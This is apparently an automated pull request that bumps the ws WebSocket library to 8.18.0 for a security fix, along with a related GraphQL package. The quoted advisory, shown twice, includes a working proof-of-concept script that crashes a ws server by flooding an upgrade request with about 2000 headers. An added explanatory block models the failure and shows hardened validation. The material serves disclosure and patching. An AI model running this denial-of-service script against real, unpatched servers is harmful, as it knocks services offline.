
[Security] Bump ws and @graphql-tools/executor-legacy-ws

Bumps ws and @graphql-tools/executor-legacy-ws. These dependencies needed to be updated together. Updates ws from 8.13.0 to 8.18.0. This update includes a security fix.

Vulnerabilities fixed

ws affected by a DoS when handling a request with many HTTP headers

Impact

A request with a number of headers exceeding the `server.maxHeadersCount` threshold could be used to crash a ws server.

Proof of concept

```js
const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;
  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;
    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
```

... (truncated)

Patched versions: 8.17.1 Affected versions: >= 8.0.0, < 8.17.1

Release notes

Sourced from ws's releases.

8.18.0

Features

  • Added support for Blob (#2229).

8.17.1

Bug fixes

  • Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the `server.maxHeadersCount` threshold could be used to crash a ws server.

```js
const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;
  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;
    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';
      if (++count === 2000) break;
    }
  }
  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';
  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });
  request.end();
});
```

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

... (truncated)
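The failure mode behind the fix above, as an added example that is not ws's code and not part of this PR: it models Node's http parser keeping only the first `server.maxHeadersCount` header pairs (default 2000) and discarding the rest, shows the handshake-check pattern that throws once the Upgrade header has been dropped, and a hardened validation that returns a status code instead. The `x-junk-*` header names and the helper functions are constructed for illustration.

```javascript
'use strict';
const DEFAULT_MAX_HEADERS_COUNT = 2000; // Node's default for server.maxHeadersCount

// Model of the parser: rawPairs is [name, value, name, value, ...]. Pairs past the
// limit are silently dropped, so a later Upgrade header never reaches the handler.
// A limit of 0 means "no limit", as in Node.
function parseWithHeaderLimit(rawPairs, maxHeadersCount = DEFAULT_MAX_HEADERS_COUNT) {
  const kept = {};
  let count = 0;
  for (let i = 0; i + 1 < rawPairs.length; i += 2) {
    if (maxHeadersCount > 0 && count >= maxHeadersCount) break; // remainder discarded
    kept[rawPairs[i].toLowerCase()] = rawPairs[i + 1];
    count++;
  }
  return kept;
}

// Pre-fix pattern: assumes the Upgrade header is present. If it was dropped this
// throws TypeError, and an unhandled throw in the upgrade path takes the process down.
function unsafeIsWebSocketUpgrade(headers) {
  return headers.upgrade.toLowerCase() === 'websocket';
}

// Hardened handshake validation: every header access tolerates absence and the
// caller gets an HTTP status to respond with rather than an exception.
function validateUpgrade(headers) {
  const upgrade = headers.upgrade;
  if (typeof upgrade !== 'string' || upgrade.toLowerCase() !== 'websocket') {
    return { ok: false, status: 400, reason: 'missing or invalid Upgrade header' };
  }
  const key = headers['sec-websocket-key'];
  if (typeof key !== 'string' || !/^[+/0-9A-Za-z]{22}==$/.test(key)) {
    return { ok: false, status: 400, reason: 'missing or invalid Sec-WebSocket-Key' };
  }
  if (headers['sec-websocket-version'] !== '13') {
    return { ok: false, status: 426, reason: 'unsupported Sec-WebSocket-Version' };
  }
  return { ok: true, status: 101, reason: 'ok' };
}

// Constructed request: `junk` filler headers ahead of the real handshake headers.
function buildRawHeaders(junk) {
  const pairs = [];
  for (let i = 0; i < junk; i++) pairs.push(`x-junk-${i}`, 'x');
  pairs.push('Connection', 'Upgrade', 'Upgrade', 'websocket',
    'Sec-WebSocket-Key', 'dGhlIHNhbXBsZSBub25jZQ==', 'Sec-WebSocket-Version', '13');
  return pairs;
}
```

With 2000 filler headers the Upgrade header is dropped: the unsafe check throws while `validateUpgrade` returns a 400, which is the behaviour the 8.17.1 fix restores.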

Commits
  • 976c53c [dist] 8.18.0
  • 59b9629 [feature] Add support for Blob (#2229)
  • 0d1b5e6 [security] Use more descriptive text for 2017 vulnerability link
  • 15f11a0 [security] Add new DoS vulnerability to SECURITY.md
  • 3c56601 [dist] 8.17.1
  • e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
  • 6a00029 [test] Increase code coverage
  • ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
  • b73b118 [dist] 8.17.0
  • 29694a5 [test] Use the highWaterMark variable
  • Additional commits viewable in compare view

Updates @graphql-tools/executor-legacy-ws from 1.0.1 to 1.0.6

Changelog

Sourced from @graphql-tools/executor-legacy-ws's changelog.

1.0.6

Patch Changes

1.0.5

Patch Changes

1.0.4

Patch Changes

1.0.3

Patch Changes

1.0.2

Patch Changes

Commits
  • f59d7d7 chore(release): update monorepo packages versions (#5929)
  • 83c0af0 No unnecessary inline fragment spreads for union types in federation and link...
  • a3259da chore(release): update monorepo packages versions (#5763)
  • 38a92ab Use ranged dependencies
  • 701cfd3 fix(deps): update dependency ws to v8.15.0 (#5762)
  • 1bd71cd chore(release): update monorepo packages versions (#5631)
  • 6c26c4f chore(deps): update all non-major dependencies (#5603)
  • 291b37b chore(release): update monorepo packages versions (#5577)
  • b153191 fix(deps): update all non-major dependencies (#5575)
  • b8b8164 chore(release): update monorepo packages versions (#5571)
  • Additional commits viewable in compare view
